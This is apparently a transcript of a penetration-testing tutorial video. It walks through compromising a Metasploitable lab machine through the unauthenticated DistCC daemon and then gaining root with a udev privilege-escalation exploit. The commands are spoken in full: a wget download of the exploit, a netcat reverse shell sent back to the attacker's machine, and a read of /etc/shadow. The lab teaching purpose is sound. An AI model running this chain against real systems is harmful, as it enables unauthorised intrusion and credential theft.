Hey guys, Jason here with RWB NetSec, and in this video we're going to be taking a look at the DistCC daemon, which is running on the Metasploitable machine. And then we're going to look and see if we can exploit any vulnerabilities that may be present there. So let's go ahead and get started with it. So first off, what is DistCC? I pulled up this description here off of the developer's website. It's basically just a program that can allow a developer to share his code out across multiple machines on a network, and those machines then can be used to help him compile the code for his project. It basically takes advantage of, if a machine has free resources, then it can use those resources for the compilation of the code. It runs on TCP port 3632, and you have a client and server type architecture. So the client would be running on the developer's machine, and then on the other machines on the network, they would be running the daemon, the listening service. The security problem with this particular package is that there's no authentication or authorization given to the code that's sent across the network. It's basically for the server port that's listening. There's no kind of checks as to what is being passed to it. I placed a couple of links here, and I will have these in the description below, so you can go and do some further research on this particular vulnerability. All right, so we'll go ahead and jump into it. I'm going to just minimize this window here and open up a terminal window, and then I'm just going to do a quick Nmap scan as a refresher for what was running on that port, and it was on 3632, and we'll do the IP for our Metasploitable machine. And this should come back and give us the version that Nmap thinks is running on this particular port and service. Alright, so Nmap reports it as running version 1. So now we could take this version, and like we have before, we could do a search on Google for any public exploits that may be out there. One other thing, Nmap also contains an NSE script that can check the version of DistCC that's running, and it can also run a check to see if it's vulnerable. If so, it will allow you to run a system command, and the output is going to be displayed by Nmap. So if we take a look at that here, the command would be Nmap. Let me clear the screen here first. So you would do Nmap TACP, we'll do the port number again, then the IP of the Metasploitable machine, then we'll do a TAC script equals, and the NSE script that's used is DistCC TAC CVE, 2004 TAC 2687. And then we need to pass an argument to this script, so we'll do TAC script TAC args equals, we'll do double quotes, DistCC CVE 2004 and 2687 .cmd equals, and I'm just going to do a uname TAC A here. So basically all this is doing is we're running an Nmap scan against this specific port on the Metasploitable machine. We're having Nmap run this NSE script for that specific vulnerability in DistCC, and we're feeding in an argument to the script, which is going to run a uname TAC A. So if this is successful, then we should see the output of uname TAC A from the nmap output. We'll let that run here for a second. All right, it's finished, and if you look here under this extra information section, it looks like the uname TAC A command was successful in running. We could verify again if we just wanted to do, I don't know, we can do just a host name just to make sure that it's giving us different output. Take it just a second here. All right, and you can see the output here then is the host name of the Metasploitable machine. So we see that the version of DistCC that's running is vulnerable. It does accept system commands. And you know, you could sit here and just type in commands here at this nmap scan. But this would be very tedious if you were trying to enumerate the machine. Not to mention it's not very fun to run it this way. So we need to look and see if there's a way that we can actually get shell access to the box. Alright, so here's where Metasploit is going to come into play. I'm just going to open a new terminal window. And we're going to launch Metasploit. So we'll do MSF console. And again, if you've just launched your Kali machine, make sure that the PostgreSQL service is also running. Alright, we've got Metasploit up here. So the first thing that we'll do is just do a search for DistCC and see if Metasploit contains any modules for it. So we'll do search DistCC, hit enter. And it's come back with one exploit module. So we will use this. We'll copy this. I'm going to set Metasploit to use this. So we'll do a use space and then just paste that exploit module in there. Hit enter. And we can see our prompt has now changed. Now if we do a show options, hit enter. And we can see with it, we just need to set the R host for this particular exploit. So we'll do set R host, then the IP address of the Metasploitable machine, hit enter, and then we'll type in exploit. Alright, it looks like it was successful. It says that a shell session was open. So let's type some commands and see if we get any responses back. I'll just do an ID, uname TAC A, host name. Alright, so all those are working, so it does look like we've got access. The one thing that I want to point out here, if you've watched the other videos, like on Samba and some of the other ones, you'll notice that when we did an ID on those, that it came back that we were running as root. In this case, we're actually running as the daemon user, which should be a limited privilege user. So if I try to read the shadow file, the etc shadow file, and it comes back and gives me a permission denied because the daemon user does not have permission to read from that file. So, and you're going to find out that a lot of times an exploit that you run against a victim, you may get shell access from it, but you may be running as a limited user. And from there, you're going to need to see if you can find a way to escalate your privileges to root user so you'll have full control of the machine. Alright, so in order for us to find ways to elevate our privileges, we need to do more enumeration on the victim machine. If you are new to this, if you've never tried to do privilege escalation before, one thing that you're going to want to look at is the the running processes on the machine, the kernel version that's in use, and the other software packages that are installed. So the first thing that we're going to look at is the running processes. So if we do, a ps aux and hit enter, and then we'll scroll all the way back up to the top here. The one that I'm going to focus on in this video is going to be Udev, because I know that there happens to be an exploit available for this specific software. So once you find the one that you want to look at, you'll want to find out which version of that software is running on the machine. In order to do that on a Debian-based system, you're going to run dpackage -L, and then we're just going to grep for Udev, hit enter, and you can see here it's given us the version number of 117-8. So now we're going to use that to look for exploits that there may be existing for Udev. Alright, since we're running these machines in host-only mode, I don't have internet access. But if we go back to our Kali machine, Kali has the Exploit DB database built into it, and you can access it by running Searchsploit. So if we do, let me clear the screen again. If we do Searchsploit and then just type in Udev, hit enter, and you can see the exploits that come back. There's 3 that are listed here. The one that we are going to focus on is the 8572.c exploit. Now we're going to have to be able to copy this exploit code over to the victim machine. And one way that you can do that is by setting up your web server on Kali. So you'll want to launch the Apache service. So if you do a service Apache 2 start, then that's going to fire up Apache on your machine, and use it as you can use it as a web server that way. And then from there, we're going to go back over. Let me just move these around a little bit. Actually, let me resize this so that I have to constantly go back and forth. Alright, so the first thing we need to do is we need to copy that 8572.c file into the var www HTML directory within Kali. So we'll do a copy, and it shows you the full path there. It's going to be user share, exploit DB, platforms, Linux, local, and then 8572.c. And we're going to copy that into /var www HTML. And then I'm going to go ahead and change into that directory. Do a quick ls, we can see that our file is in there now. So in order to get that file up to our victim machine, we're going to use wget to do the transfer. So we'll do wget IP address of our Kali machine /8572.c, and I'm going to do a capital O, and I'm just going to call the file msp2.c. Hit enter. Alright, it looks like it was successful. So if we do an ls, and I'm in the sorry, I should have mentioned this, I'm in the temp directory on Metasploitable. So here we can see that our file was copied over. Alright, so one thing that we need to do is actually look at that exploit code and see what it requires to run. So let me pull this up here a second. If we go into the directory where that code lives, and I'm just going to open it up with gedit. And you can see here it's got a section under usage that tells you how to use this exploit. So it's using the process ID of the Udev netlink socket. So I'm going to go ahead and close that out. Minimize this. Alright, so when this exploit runs, it's going to read from a file called run that lives in the temp directory. So on our Metasploitable machine, we're going to want to create a file called run, and we're just going to do a touch run. And we're going to need to create a couple of lines inside of that file. So we're going to use echo to do that. So we'll do an echo, the bash shebang /bin shell, send it to the run file, hit enter, and then we're going to do another echo for bin netcat tac e bin shell, and put the IP address of your Kali machine on port, we'll do 5555. And then we're going to append that to the run file. So basically this run file is being used as the payload for the Udev exploit. The next thing that we're going to do is we need to actually compile the source code that we copied over, that msp2.c file. And for that we're going to use the GCC compiler that is installed in Kali. So we'll just do a simple GCC msp2.c, and we're going to do a tac O to name the output file, and I'm just going to call it msp2. If I could type, hit enter, and if we do an ls, we'll see that we've got our compiled code here, and we've got the run file that we created. If we do we can just do a quick cat on the run file just to make sure that those lines of code actually are in that file. So we'll do cat run, and we can see they're there. So basically what we're doing, once the Udev exploit is kicked off, it's going to hit this run file and it's going to execute this netcat session, which is telling it to shovel out a shell to my Kali machine on port 5555. The next thing that we're going to need to do, according to the Udev exploit, we need to get the process ID for the Udev netlink socket. And you can do that by doing a cat /proc net netlink. If you hit enter there, you'll see the process ID here of 2344. You'll need to make note of that because that's going to come into play when we actually run the exploit. So the next thing that we're going to do is we need to set up the listener on our Kali machine so we can catch the shell that comes back. So I'm going to clear this screen, set up the netcat listener, hit enter here, and then we're going to go back to the Metasploitable machine. We need to make our compiled code executable, so I'm going to do a quick change mod +x msp2, And from here we should be ready now to run the code. And the way it works is we're going to run our Udev exploit, and we have to give it the argument of this process ID. So all you have to do there is type in 2344. You'll hit enter here, and if you'll look at your listener, you'll see that a connection was established from the Metasploitable machine to the Kali machine. So if we come down here now and type in ID, we now have root access to the machine. I'll do another uname tac A. And now if we try to read the shadow file, it was successful. You can see again, here is our MSF admin account. So we've used two different exploits against Metasploitable and this DistCC. The DistCC exploit gave us access to the machine, but we were running as a limited user account from there. We couldn't really do a whole lot with it. But by being able to enumerate and looking at the software packages that were running, we were able to find another exploit that gave us root access. So if this is the first time that you have looked at doing privilege escalation and you're feeling maybe a little bit confused about what we just did, I would suggest go back and watch the video again. Maybe write down some notes on each step of the process that we went through. And I will say that this was just one method of escalation. There may be several more ways on Metasploitable to achieve root access, but I just wanted to focus on this one particular method for this video. So I would say to you guys, continue enumerating the machine and see if there are other ways you can find to get root access. Like I said before, focus on things like the kernel version and the other software packages that are installed. Maybe look to see if some of the software packages are misconfigured or if there are any public exploits that are available for them. So I hope you guys enjoyed the video. If it's your first time here, I would love if you subscribe to the channel and share it out with all of your friends. So my hope is to build a community where we can help each other learn and grow in security, especially if you're just getting into it. If you have any questions or comments, please leave them below. And again, thanks for watching. I hope you all have an awesome day. See you guys.